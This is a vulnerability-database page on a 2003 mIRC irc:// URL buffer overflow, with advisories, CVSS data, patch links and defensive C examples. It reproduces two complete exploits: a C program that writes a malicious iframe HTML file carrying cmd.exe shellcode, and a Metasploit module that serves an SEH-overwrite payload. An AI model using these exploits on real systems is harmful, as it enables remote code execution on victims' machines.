CVE-2003-1336
CVSS 9.3
Published: 2003-12-31 00:00:00
Revised: 2010-06-23 00:00:00

[Original] Buffer overflow in mIRC before 6.11 allows remote attackers to execute arbitrary code via a long irc:// URL.


[CNNVD] mIRC IRC URL Buffer Overflow Vulnerability (CNNVD-200312-326)

        
mIRC is a popular online chat (IRC) client for Windows.

mIRC does not perform sufficient bounds checking when handling URLs of the 'irc://' scheme. A remote attacker can exploit this to trigger a buffer overflow in a targeted user's client and potentially execute arbitrary code with the privileges of the mIRC process.

When installed, mIRC registers itself as the handler for the 'irc://' URL scheme, but it does not check the length of an 'irc://' URL against the buffer it is copied into. An attacker who constructs a malicious URL and induces mIRC to open it (for example through a web page or an HTML e-mail that embeds the URL) can trigger the overflow; a carefully crafted URL may lead to arbitrary code execution with the privileges of the mIRC process.
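The bug class described above, as an added illustration that is not mIRC's code (mIRC is closed source, and this page does not give the real buffer size): a handler that copies the host part of an irc:// URL into a fixed stack buffer with no length check, next to a version that rejects overlong or malformed hosts before copying anything. The buffer size HOST_MAX and the accepted hostname alphabet are assumptions made for the example; the 1200-byte input is constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the handler's host buffer; the page does not document mIRC's real value. */
#define HOST_MAX 256

/* Vulnerable pattern (illustration only, not mIRC's code): the host part of the URL is
 * copied into a fixed-size stack buffer without comparing its length to the buffer.
 * A host longer than HOST_MAX-1 bytes overruns `host` and whatever sits above it on
 * the stack (saved return address, SEH record), which is what the exploits on this
 * page abuse. Only ever call this with short, trusted input. */
int irc_host_unsafe(const char *url, char *out, size_t outcap) {
    char host[HOST_MAX];
    if (strncmp(url, "irc://", 6) != 0) return -1;
    const char *p = url + 6;
    size_t n = strcspn(p, ":/?#");        /* host ends at port, path, query or fragment */
    memcpy(host, p, n);                    /* BUG: n is never checked against sizeof host */
    host[n] = '\0';
    strncpy(out, host, outcap - 1);        /* hand the parsed host back to the caller */
    out[outcap - 1] = '\0';
    return 0;
}

/* Hardened version: length and character checks happen before any byte is copied.
 * Returns 0 on success, -1 for a non-irc URL, -2 if the host is empty or does not fit
 * in `outcap` bytes (rejected rather than silently truncated), -3 if it contains
 * characters outside the assumed hostname alphabet [A-Za-z0-9.-]. */
int irc_host_safe(const char *url, char *out, size_t outcap) {
    if (url == NULL || out == NULL || outcap == 0) return -2;
    if (strncmp(url, "irc://", 6) != 0) return -1;
    const char *p = url + 6;
    size_t n = strcspn(p, ":/?#");
    if (n == 0 || n >= outcap) return -2;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)p[i];
        if (!isalnum(c) && c != '.' && c != '-') return -3;
    }
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Build "irc://" followed by `hostlen` 'A' bytes: a constructed input in the shape of the
 * filler the exploits on this page send. Returns the URL length, or 0 if `cap` is too small. */
size_t make_irc_url(char *buf, size_t cap, size_t hostlen) {
    if (cap < 6 + hostlen + 1) return 0;
    memcpy(buf, "irc://", 6);
    memset(buf + 6, 'A', hostlen);
    buf[6 + hostlen] = '\0';
    return 6 + hostlen;
}

int main(void) {
    char host[HOST_MAX];
    char evil[1300];
    int rc = irc_host_safe("irc://irc.example.net:6667/#chan", host, sizeof host);
    printf("benign URL: rc=%d host=%s\n", rc, host);                  /* rc=0 host=irc.example.net */
    make_irc_url(evil, sizeof evil, 1200);                               /* 1200-byte host, past the 998 blasty cites */
    rc = irc_host_safe(evil, host, sizeof host);
    printf("1200-byte host: rc=%d (rejected before any copy)\n", rc);   /* rc=-2 */
    return 0;
}
```

The point of the hardened form is the order of operations: the length is compared to the destination capacity and the content is validated before memcpy runs, and an oversized host is refused outright rather than truncated, so the caller cannot end up connecting to a different host than the one that was typed.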
        

- CVSS (Base Score)

CVSS score: 9.3 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in total shutdown of the affected system]
Access complexity: MEDIUM [some access conditions must be met to exploit]
Access vector: NETWORK [no local or internal-network access required]
Authentication: NONE [no authentication required to exploit]

- CWE (Weakness Category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1336
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1336
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-326
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/8819
(PATCH)  BID  8819
http://www.securiteam.com/windowsntfocus/6M00B0U8KE.html
(PATCH)  MISC  http://www.securiteam.com/windowsntfocus/6M00B0U8KE.html
http://secunia.com/advisories/9996
(VENDOR_ADVISORY)  SECUNIA  9996
http://archives.neohapsis.com/archives/ntbugtraq/2003-q4/0060.html
(PATCH)  NTBUGTRAQ  20031015 mIRC Buffer Overflow in irc protocol handler
http://xforce.iss.net/xforce/xfdb/13405
(UNKNOWN)  XF  mirc-ircprotocol-execute-code(13405)
http://www.osvdb.org/2665
(UNKNOWN)  OSVDB  2665

- Vulnerability Information

mIRC IRC URL Buffer Overflow Vulnerability
High severity  Buffer overflow
2003-12-31 00:00:00  2007-09-24 00:00:00
Remote

- Advisories and Patches

Vendor patch:
Khaled Mardam-Bey
-----------------
The vendor has released an upgrade that fixes this issue; download it from the vendor's home page:
Khaled Mardam-Bey mIRC 6.1:
Khaled Mardam-Bey Upgrade mirc611.exe

http://www.mirc.com/get.html

- Vulnerability Information (112)

mIRC 6.1 "IRC" Protocol Remote Buffer Overflow Exploit (EDBID:112)
windows remote
2003-10-21 Verified
0 blasty
/** remote mirc < 6.11 exploit by blasty
 **
 ** TESTED ON: Windows XP (No SP, Dutch) Build: 2600.xpclient.010817-1148
 **
 ** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
 ** nobody had written an exploit yet. So I decided to start writing one.
 ** Since this was my first time coding an exploit for windows, it took some
 ** research before I got the hang of it. (Ollydbg is much more confusing than GDB btw :P)
 **
 ** This exploit (ab)uses the bug in irc:// URI handling. It contains a buffer
 ** overflow, and when more than 998 bytes are given EIP will be overwritten.
 **
 ** At first I was thinking of a simple solution to get this exploitable. Since
 ** giving a URI with > 998 chars to someone on IRC is simply NOT done :)
 ** Then I remembered the iframe-irc:// flaw found by uuuppzz [2]
 **
 ** This exploit will write a malicious HTML file containing an iframe executing the
 ** irc:// address. So you can give this to anyone on IRC for example ;)
 ** The shellcode included only executes cmd.exe, because I don't want this to be
 ** a scriptkiddy util. But replacing the shellcode with your own is also possible.
 ** A 400-byte shellcode (bindshell etc.) easily fits in the buffer, but it may require
 ** some tweaking.
 ** After exiting cmd.exe mIRC will crash, so the shellcode isn't 100% clean, but who carez :)
 **
 ** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
 ** mIRC will start automatically when an irc:// is executed, so you can also send somebody
 ** an HTML email containing the evil HTML code. (only for poor clients like Outlook Express :P)
 **
 **/

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* memset(), memcpy(), strlen() */
#include <stdint.h>   /* uint32_t: the return address must be written as exactly 4 bytes */

/* Stupid cmd.exe exec shellcode. hey! I r !evil ;) */
unsigned char shellcode[] =
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
	"\x44\x80\xbf\x77"			//	0x77bf8044 <- address of system() (little-endian; the tested XP build)
	"\xff\xd0";				//  	call    system()


char jmpback[] =
        "\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode :)

char buffer[1100], fstring[1300]; // heh, need to clean this up (globals, so zero-filled)

int main(int argc, char *argv[]) {
	FILE *evil;
	uint32_t ret = 0x77F4801C;	// took this one from ntdll.dll (jmp esp)

	fprintf(stdout, "---------------------------------------------\n"
			"mIRC < 6.11 remote exploit by blasty@geekz.nl\n"
			"Exploit downloaded on www.k-otik.com\n"
			"---------------------------------------------\n\n");

	// NOPslides are cool (the final byte stays 0 so buffer is a valid C string)
	memset(buffer, 0x90, sizeof(buffer) - 1);

	// place shellcode in buffer
	memcpy(buffer + 20, shellcode, strlen((const char *)shellcode));

	// overwrite the saved EIP at offset 994 with the jmp esp address
	memcpy(&buffer[994], &ret, sizeof(ret));

	// place jmpback shellcode in buffer
	memcpy(buffer + 20 + strlen((const char *)shellcode) + 1010, jmpback, strlen(jmpback));

	printf("[+] Evil buffer constructed\n");


	// open HTML file for writing
	if((evil = fopen("index.html", "a+")) != NULL) {

		// construct evil string :)
		sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);

		// write string to file
		fputs(fstring, evil);

		// close file
		fclose(evil);

		printf("[+] Evil HTML file written!\n");
		return(0);
	} else {
		// uh oh.. :/
		fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
		exit(1);
	}
}


// milw0rm.com [2003-10-21]
		

- Vulnerability Information (16530)

mIRC IRC URL Buffer Overflow (EDBID:16530)
windows remote
2010-05-09 Verified
0 metasploit
##
# $Id: mirc_irc_url.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'mIRC IRC URL Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in mIRC 6.1. By
				submitting an overly long and specially crafted URL to
				the 'irc' protocol, an attacker can overwrite the buffer
				and control program execution.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2003-1336'],
					[ 'OSVDB', '2665'],
					[ 'BID', '8819' ],
				],

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},

			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro English All',   { 'Offset' => 1442, 'Ret' => 0x75022ac4 } ],
					[ 'Windows XP Pro SP0/SP1 English', { 'Offset' => 1414, 'Ret' => 0x71aa32ad } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Oct 13 2003',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		filler =  rand_text_alphanumeric(target['Offset'], payload_badchars)
		seh    = generate_seh_payload(target.ret)
		sploit = filler + seh

		# Build the HTML content
		content = "<html><iframe src='irc://#{sploit}'></html>"

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end
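A defensive check drawn from the two delivery paths shown above (the index.html blasty's exploit writes and the HTML response the Metasploit module's on_request_uri sends), added here as an example and not taken from either exploit: a scanner that walks an HTML or e-mail body, measures each irc:// URI up to the next quote, angle bracket or whitespace, and flags any longer than a threshold. The 998-byte threshold is the figure blasty's header gives for overwriting EIP; the attribute-delimiter set and the sample HTML are constructed for the example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* True if the six bytes at `p` spell "irc://" in any letter case. Caller guarantees
 * at least six readable bytes. */
static int has_irc_scheme(const char *p) {
    static const char scheme[] = "irc://";
    for (size_t i = 0; i < 6; i++)
        if (tolower((unsigned char)p[i]) != scheme[i]) return 0;
    return 1;
}

/* Length in bytes of the irc:// URI starting at `p`: everything up to the first byte
 * that would end an HTML attribute value or a bare URL (quote, angle bracket,
 * whitespace, NUL), or `avail` if none occurs. The count is byte-wise, so binary
 * filler such as the NOP sled in the C exploit above is measured, not skipped. */
size_t irc_uri_len(const char *p, size_t avail) {
    size_t n = 0;
    while (n < avail) {
        unsigned char c = (unsigned char)p[n];
        if (c == '\0' || c == '\'' || c == '"' || c == '<' || c == '>' ||
            c == ' ' || c == '\t' || c == '\r' || c == '\n')
            break;
        n++;
    }
    return n;
}

/* Scan `len` bytes of an HTML or e-mail body for irc:// URIs. Returns how many exceed
 * `limit` bytes and, through *longest, the longest URI seen (0 if none). */
int count_long_irc_uris(const char *body, size_t len, size_t limit, size_t *longest) {
    int hits = 0;
    size_t i = 0, max = 0;
    while (i + 6 <= len) {
        if (has_irc_scheme(body + i)) {
            size_t n = irc_uri_len(body + i, len - i);   /* n >= 6: the scheme itself matched */
            if (n > max) max = n;
            if (n > limit) hits++;
            i += n;
        } else {
            i++;
        }
    }
    if (longest) *longest = max;
    return hits;
}

/* Constructed sample: one ordinary irc:// link plus an iframe whose src carries
 * `filler` bytes of 'A', the shape both exploits on this page emit. Returns the number
 * of bytes written (excluding the NUL), or 0 if `cap` is too small. */
size_t build_sample_html(char *buf, size_t cap, size_t filler) {
    static const char pre[]  = "<html><a href=\"irc://irc.example.net/#chan\">join</a>"
                               "<iframe src='irc://";
    static const char post[] = "'></iframe></html>";
    size_t need = (sizeof pre - 1) + filler + (sizeof post - 1);
    if (cap < need + 1) return 0;
    memcpy(buf, pre, sizeof pre - 1);
    memset(buf + (sizeof pre - 1), 'A', filler);
    memcpy(buf + (sizeof pre - 1) + filler, post, sizeof post);   /* copies the NUL too */
    return need;
}

int main(void) {
    char html[2000];
    size_t longest = 0;
    size_t n = build_sample_html(html, sizeof html, 1500);
    int hits = count_long_irc_uris(html, n, 998, &longest);
    printf("%d oversized irc:// URI(s); longest is %zu bytes\n", hits, longest);   /* 1; 1506 */
    return 0;
}
```

The scan takes an explicit length rather than trusting NUL termination, because the C exploit's buffer is mostly 0x90 bytes and a mail or proxy filter may be handed raw octets; a length-only heuristic like this catches both exploits here, since each needs well over 998 bytes of filler before its return address or SEH record, but it says nothing about short URIs and should sit alongside the real fix, which is upgrading to mIRC 6.11.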
		

- Vulnerability Information (F83236)

mIRC IRC URL Buffer Overflow (PacketStormID:F83236)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,protocol
CVE-2003-1336

This Metasploit module exploits a stack overflow in mIRC 6.1. By submitting an overly long and specially crafted URL to the 'irc' protocol, an attacker can overwrite the buffer and control program execution.

(Module source identical to the EDB-ID 16530 listing above.)

- Vulnerability Information

2665
mIRC IRC URI Handler Overflow
Input Manipulation
Loss of Integrity  Upgrade
Vendor Verified

- Vulnerability Description

mIRC contains a flaw that could allow an attacker to remotely compromise the system via a buffer overflow. If a malicious attacker sends an overly long, specially crafted hostname using the irc: URI, the buffer will overflow and allow the attacker to execute arbitrary code.

- Timeline

2003-10-14 2003-10-14
Unknown Unknown

- Solution

Upgrade to version 6.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

